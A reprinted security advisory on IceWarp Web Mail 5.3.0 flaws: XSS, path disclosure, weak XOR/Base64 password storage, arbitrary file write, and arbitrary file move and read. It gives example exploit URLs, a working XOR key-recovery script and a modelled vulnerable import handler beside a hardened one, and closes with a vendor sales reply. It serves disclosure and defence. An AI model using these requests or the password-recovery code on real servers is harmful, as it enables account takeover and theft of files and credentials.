[Reprint] Multiple vulnerabilities in Icewarp Web Mail 5.3.0
Source: [url]www.securityfocus.com[/url]
TITLE: Multiple vulnerabilities in Icewarp Web Mail 5.3.0 : New holes.
BACKGROUND
Merak Mail Server, with the revolutionary Merak Mail Server GroupWare Server, cutting-edge Merak Mail Server Instant Antispam and much more, is the fastest, most stable, secure and 100% virus free mail server on the market today.
Every day companies choose Merak Mail Server's stability, speed, security, functionality, scalability and multi-tiered delegated manageability over products costing thousands of dollars more yet lacking the sophistication that Merak delivers.
In less than 10 minutes you can have the same professional email server that organizations such as NATO, the U.S. Navy, the FBI, Toyota, the U.S. Government, and many ISP Providers and Developers depend on every day.
Source: [url]www.MerakMailServer.com[/url]
VULNERABLE PRODUCTS
MERAK Mail Server 7.6.0 with Icewarp Web Mail 5.3.0
MERAK Mail Server 7.6.4r with Icewarp Web Mail 5.3.2 (vulnerabilities #2,#3 only)
DETAILS
1. Multiple cross-site scripting (XSS) vulnerabilities.
Description:
A remote user who has an account on Merak Mail Server can carry out cross-site scripting (XSS) attacks: the parameters listed below are returned in the page without HTML encoding.
Vulnerable pages:
login.html
accountsettings_add.html
calendar_addnote.html
calendar_addtask.html
calendar_addevent.html
Examples:
[url]http://localhost:32000/mail/login.html?username=[/url][xss_here]
[url]http://localhost:32000/mail/accountsettings_add.html?id=[/url][]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[xss_here]
[url]http://localhost:32000/mail/calendar.html[/url] -> AddNote -> [Title]= [xss_here]
[url]http://localhost:32000/mail/calendar.html[/url] -> AddTask -> [Note]=[xss_here]
[url]http://localhost:32000/mail/calendar.html[/url] -> AddEvent -> [Note]=[xss_here]
[url]http://localhost:32000/mail/calendar.html[/url] -> AddEvent -> [Title]= [xss_here]
[url]http://localhost:32000/mail/calendar.html[/url] -> AddEvent -> [Location]= [xss_here]
2. Full install path disclosure.
Description:
A remote user who has an account on Merak Mail Server can obtain the full installation path of the product. This could be used during an attack on the affected system.
Vulnerable pages:
calendar_d.html
calendar_m.html
calendar_w.html
calendar_y.html
Examples:
[url]http://localhost:32000/mail/calendar_d.html?id=[/url][sessionid]
[url]http://localhost:32000/mail/calendar_m.html?id=[/url][sessionid]
[url]http://localhost:32000/mail/calendar_w.html?id=[/url][sessionid]
[url]http://localhost:32000/mail/calendar_y.html?id=[/url][sessionid]
Note: MERAK Mail Server 7.6.4r with Icewarp Web Mail 5.3.2 is also vulnerable to this.
3. Weak encryption of user passwords.
Description:
User passwords are stored with very weak protection: XOR in users.cfg and settings.cfg, and plain BASE64 encoding in users.dat and user.dat. BASE64 is an encoding, not encryption, so those passwords are readable directly. An attacker who gains access to these files can recover user and administrator passwords.
Vulnerable files:
[MerakDir]\config\settings.cfg
[MerakDir]\config\[Domain]\users.cfg
[MerakDir]\webmail\config\users.dat
[MerakDir]\webmail\users\[Domain]\[User]\user.dat
Note: MERAK Mail Server 7.6.4r with Icewarp Web Mail 5.3.2 is also vulnerable to this.
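The following is an added example, not IceWarp or Merak code. The advisory does not give the XOR key or the exact on-disk layout, so the file formats below are constructed ("user=<hex of password XOR key>" for users.cfg, "user:<base64 password>" for users.dat) and the key is assumed to be fixed and repeating. It shows why this storage is no protection: the Base64 entries decode directly, and because the attacker already holds a legitimate account, his own known password is enough known plaintext to recover the XOR key and decrypt every other entry, including the administrator's.

```python
import base64
from itertools import cycle

# Constructed sample: a server-side key the attacker never sees. Only used to
# build the sample files; the recovery code below never references it.
SAMPLE_KEY = b"K3y!"


def xor_bytes(data, key):
    """XOR data with a repeating key (the assumed users.cfg scheme)."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def build_sample_files():
    """Constructed users.cfg and users.dat for two accounts (not real data)."""
    passwords = {"admin": b"C0rrectHorse", "hacker": b"31337pass"}
    users_cfg = "\n".join(
        f"{u}={xor_bytes(p, SAMPLE_KEY).hex()}" for u, p in passwords.items())
    users_dat = "\n".join(
        f"{u}:{base64.b64encode(p).decode()}" for u, p in passwords.items())
    return users_cfg, users_dat


def decode_users_dat(text):
    """Base64 is an encoding, not encryption: every password decodes directly."""
    out = {}
    for line in text.splitlines():
        user, _, enc = line.partition(":")
        out[user] = base64.b64decode(enc)
    return out


def recover_xor_key(ciphertext, known_plaintext, max_key_len=16):
    """Known-plaintext attack on a fixed XOR key.

    ciphertext XOR plaintext gives the keystream; the shortest period that
    repeats consistently across the known bytes is taken as the key. If the
    known password is shorter than the key, the result is only a truncated
    key, which decrypts just the first bytes of other passwords.
    """
    stream = xor_bytes(ciphertext[:len(known_plaintext)], known_plaintext)
    for key_len in range(1, min(max_key_len, len(stream)) + 1):
        key = stream[:key_len]
        if all(stream[i] == key[i % key_len] for i in range(len(stream))):
            return key
    return None


def recover_all_passwords(users_cfg, own_user, own_password):
    """The attacker owns one account (as the advisory requires), so he knows
    one plaintext; that is enough to derive the key and decrypt everyone."""
    entries = {}
    for line in users_cfg.splitlines():
        user, _, enc = line.partition("=")
        entries[user] = bytes.fromhex(enc)
    key = recover_xor_key(entries[own_user], own_password)
    if key is None:
        return {}
    return {u: xor_bytes(ct, key) for u, ct in entries.items()}


if __name__ == "__main__":
    cfg, dat = build_sample_files()
    print("users.dat decoded:", decode_users_dat(dat))
    print("users.cfg decrypted via own account:",
          recover_all_passwords(cfg, "hacker", b"31337pass"))
```

The period check in recover_xor_key is what makes the attack work without knowing the key length in advance; a reviewer checking a "custom encryption" scheme can apply the same test to any file where one plaintext is known.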
4. File creation with arbitrary content on the remote system.
Description:
A remote user who has an account on Merak Mail Server can create a text file on the server with arbitrary content (including special characters). The file is written to [MerakDir]\webmail\users\[Domain]\[User]\accounts.dat.
Vulnerable page: accountsettings_add.html
Example:
[url]http://localhost:32000/mail/accountsettings_add.html?id=[/url][sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[arbitrary text]
5. Moving and viewing arbitrary files on the remote system.
Description:
A remote user who has an account on Merak Mail Server can move arbitrary files on the target's local file system. The file is moved into the [MerakDir]\webmail\users\[Domain]\[User] folder and renamed to import.tmp, after which the attacker can view it and import/export it to/from the address book. Because the original file is moved away, this can be used to cause a denial of service (DoS); it also gives read access to arbitrary files on the affected system. From user.dat and users.dat the attacker can obtain user and administrator passwords (vulnerability #3) and take complete control of the Merak Mail Server. With administrator privileges on Merak Mail Server, the attacker can use the product's [Executables] function to run arbitrary commands on the remote system with the mail server's privileges; if Merak Mail Server is running under an administrator account, this gives complete control of the affected system. The vulnerability can also be used to check whether arbitrary files exist on the remote system.
Vulnerable page: importaction.html
Example:
[url]http://localhost:32000/importaction.html?id=[/url][sessionid]&importfile=[arbitrary path]&action=upload&Import=1&importfile_size=1000000
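Added example, not IceWarp or Merak code: a model of the importaction.html behaviour described above beside a hardened replacement. The directory layout, function names and sample file contents are assumptions for illustration; the real control.exe code is not available here. The vulnerable handler does what the advisory describes (takes importfile from the request and moves whatever it points at into the user's folder as import.tmp), while the hardened one accepts only the uploaded body, sizes it from the bytes actually received rather than a client-supplied importfile_size, and refuses any client-supplied name that escapes the user's own folder.

```python
import shutil
import tempfile
from pathlib import Path


def vulnerable_import(importfile, user_dir):
    """Models the advisory's importaction.html: importfile comes straight from
    the request (importfile=[arbitrary path]) and is moved into the user's
    folder as import.tmp. Any file the mail server can read becomes viewable
    through the address-book import, and the original is gone (DoS)."""
    dest = user_dir / "import.tmp"
    shutil.move(importfile, str(dest))
    return dest


def hardened_import(upload, user_dir, max_size=1_000_000):
    """Never accept a server-side path from the client. Only the uploaded
    body is written, and the size limit is enforced on the received bytes."""
    if len(upload) > max_size:
        raise ValueError("upload too large")
    dest = user_dir / "import.tmp"
    dest.write_bytes(upload)
    return dest


def safe_user_file(user_dir, name):
    """For any later operation that takes a file name from the client (view,
    export), resolve it and refuse anything outside the user's own folder."""
    base = user_dir.resolve()
    candidate = (base / name).resolve()
    if candidate == base or base not in candidate.parents:
        raise PermissionError(f"{name!r} escapes the user folder")
    return candidate


def demo():
    """Build a constructed Merak-like tree in a temp dir and run both handlers.
    Returns a dict of observations so the behaviour can be checked."""
    root = Path(tempfile.mkdtemp())
    config = root / "config" / "settings.cfg"
    config.parent.mkdir(parents=True)
    config.write_text("AdminPassword=<constructed sample blob>\n")
    user_dir = root / "webmail" / "users" / "example.com" / "hacker"
    user_dir.mkdir(parents=True)
    result = {}

    # Attacker supplies a server path: settings.cfg lands in his folder.
    moved = vulnerable_import(str(config), user_dir)
    result["vulnerable_leaks_config"] = moved.read_text().startswith("AdminPassword=")
    result["vulnerable_destroys_original"] = not config.exists()
    moved.unlink()

    # Hardened handler: only the uploaded bytes reach disk.
    dest = hardened_import(b"name,email\nalice,alice@example.com\n", user_dir)
    result["hardened_writes_upload_only"] = dest.read_text().startswith("name,email")
    try:
        hardened_import(b"x" * 11, user_dir, max_size=10)
        result["oversize_rejected"] = False
    except ValueError:
        result["oversize_rejected"] = True

    # Client-supplied names are confined to the user's folder.
    try:
        safe_user_file(user_dir, "../../../../config/settings.cfg")
        result["traversal_rejected"] = False
    except PermissionError:
        result["traversal_rejected"] = True
    result["plain_name_allowed"] = safe_user_file(user_dir, "import.tmp").name == "import.tmp"

    shutil.rmtree(root)
    return result


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

The containment check in safe_user_file resolves symlinks and ".." before comparing, which is the part string-prefix checks on the raw name get wrong.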
EXPLOITATION
IceWarp Web Mail (the control.exe service) must be running on Merak Mail Server, and an account on Merak Mail Server is needed.
WORKAROUND
Upgrade to MERAK Mail Server 7.6.4r with Icewarp Web Mail 5.3.2, or disable the Icewarp Web Mail service (Control.exe). Note that 7.6.4r with 5.3.2 is still affected by vulnerabilities #2 and #3 (see VULNERABLE PRODUCTS).
VENDOR STATUS
Not contacted.
SUMMARY
An attacker who successfully exploited the vulnerabilities described in this report could take complete control of Merak Mail Server 7.6.0 or of the affected remote system. Merak Mail Server 7.6.4r with Icewarp Web Mail 5.3.2 is also vulnerable to other critical vulnerabilities not described in this report; an attacker who successfully exploited them could take complete control of Merak Mail Server or of the affected remote system. I do not advise using this product; you must disable the Icewarp Web Mail service.
CREDITS
ShineShadow, independent IT security expert.
To get more information, please contact me by e-mail.
26.01.2005
ShineShadow,
ss_contacts hotmail com

I am Ni Biran, customer representative of the China branch of IceWarp Ltd., developer of Europe's leading e-mail system Merak Mail Server. I am very glad to know that so many customers appreciate IceWarp, and I thank your company for its continued support. What you are still publishing at ([url]http://www.eviloctal.com/forum/htm_data/25/0501/7340.html[/url]) is our old version.
IceWarp China holds all trademark/brand rights for IceWarp and Merak Mail Server (registered worldwide and in Beijing). To regulate the Chinese market, all websites may only offer our official trial version unless they have obtained our written authorization. Continuing to offer cracked, unofficial or Beta test versions constitutes infringement and carries legal liability.
We can provide the latest trial version of Merak Mail Server V8.3.0 (Chinese and English) free of charge.
Software size: 25M
Software language: Traditional Chinese / Simplified Chinese / German / English
Platform: Win9x/NT/2000/2003/XP/64bit/Linux
Developer: IceWarp Ltd. (Europe)
Website: [url]www.icewarp.cn[/url]
Contact: [email]sales@icewarp.cn[/email]
Download: [url]http://www.icewarp.cn/Download/index_gb.html[/url]
So that your company and your customers can use Merak Mail Server properly and to better effect, please upgrade to our latest version as soon as possible.
You are welcome to contact us for first-hand information. You can also carry the latest version on your website to raise your site's click-through and download counts and gain customers.
If you would like more product information and pricing, please contact us:
China 微力 (Weili) [url]Http://www.icewarp.cn[/url]
Address: Room 1901, Tower B, Tian'an International Building, Renmin South Road, Luohu District, Shenzhen. Contact: Ni Biran
7*27-hour consultation hotline: 0755-82186489/82185489-3026 Fax: 0755-82182989
E-mail: jackal@icewarp.cn MSN: [email]wanghao8788@hotmail.com[/email]
As someone in IT, are you still troubled by hundreds of spam and virus e-mails every day? Or spending tens of thousands, even over a hundred thousand, on hardware filters to cope with it? On the other hand, which e-mail software are you recommending to your customers? Do you want to recommend the best product to them? You urgently need a secure, reliable, effective and affordable e-mail system; the Weili e-mail system is the best choice for you and your customers.
Log on to [url]www.icewarp.cn[/url] now and download Merak Mail Server, your best e-mail service system.
